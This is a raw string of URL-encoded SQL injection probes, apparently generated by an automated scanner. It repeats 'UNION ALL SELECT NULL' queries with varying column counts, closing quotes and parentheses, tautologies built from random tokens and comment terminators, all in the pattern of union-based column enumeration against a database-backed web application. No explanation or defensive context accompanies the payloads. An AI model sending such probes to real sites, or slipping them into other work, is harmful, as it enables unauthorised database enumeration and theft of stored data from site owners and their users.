1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22VVBy%22%3D%22VVBy 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22MQxR%22%3D%22MQxR 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22rqnD%22%3D%22rqnD 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22nspy%22%3D%22nspy 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22cVPj%22%3D%22cVPj 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22Igoy%22%3D%22Igoy 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22fDmM%22%3D%22fDmM 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22mQOU%22%3D%22mQOU 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ysQC%22%3D%22ysQC 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22kNBQ%22%3D%22kNBQ 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22dNoz%22%3D%22dNoz 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22toMU%22%3D%22toMU 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22eiYw%22%3D%22eiYw 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22zCsx%22%3D%22zCsx 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22cIYG%22%3D%22cIYG 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22XprW%22%3D%22XprW 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ampH%22%20LIKE%20%22ampH 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ZBfw%22%20LIKE%20%22ZBfw 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22SFRv%22%20LIKE%20%22SFRv 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22VUfM%22%20LIKE%20%22VUfM 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22HGsk%22%20LIKE%20%22HGsk 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22lunp%22%20LIKE%20%22lunp 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22WSxh%22%20LIKE%20%22WSxh 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22VLIe%22%20LIKE%20%22VLIe 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22UMAC%22%20LIKE%20%22UMAC 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22qXPo%22%20LIKE%20%22qXPo 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22rdot%22%20LIKE%20%22rdot 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22GLSp%22%20LIKE%20%22GLSp 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22EeOD%22%20LIKE%20%22EeOD 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ppNo%22%20LIKE%20%22ppNo 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22pNeZ%22%20LIKE%20%22pNeZ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22SGDn%22%20LIKE%20%22SGDn 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22IITJ%22%20LIKE%20%22IITJ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22eHVW%22%20LIKE%20%22eHVW 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22pcGJ%22%20LIKE%20%22pcGJ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22TOjT%22%20LIKE%20%22TOjT 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22MoCs%22%20LIKE%20%22MoCs 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22TOnx%22%20LIKE%20%22TOnx 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HiDu%22%20LIKE%20%22HiDu 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22VQcM%22%20LIKE%20%22VQcM 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22BbpH%22%20LIKE%20%22BbpH 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22YgCL%22%20LIKE%20%22YgCL 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22FSLz%22%20LIKE%20%22FSLz 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ssaI%22%20LIKE%20%22ssaI 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22OfuC%22%20LIKE%20%22OfuC 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22qGOl%22%20LIKE%20%22qGOl 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22KQLR%22%20LIKE%20%22KQLR 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22BIrJ%22%20LIKE%20%22BIrJ 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22RurY%22%20LIKE%20%22RurY 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22PMSM%22%20LIKE%20%22PMSM 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Mquo%22%20LIKE%20%22Mquo 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22wncV%22%20LIKE%20%22wncV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22INYv%22%20LIKE%20%22INYv 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22kOsE%22%20LIKE%20%22kOsE 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Mrxv%22%20LIKE%20%22Mrxv 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22PFia%22%20LIKE%20%22PFia 1%29%20WHERE%206207%3D6207%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%207328%3D7328%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 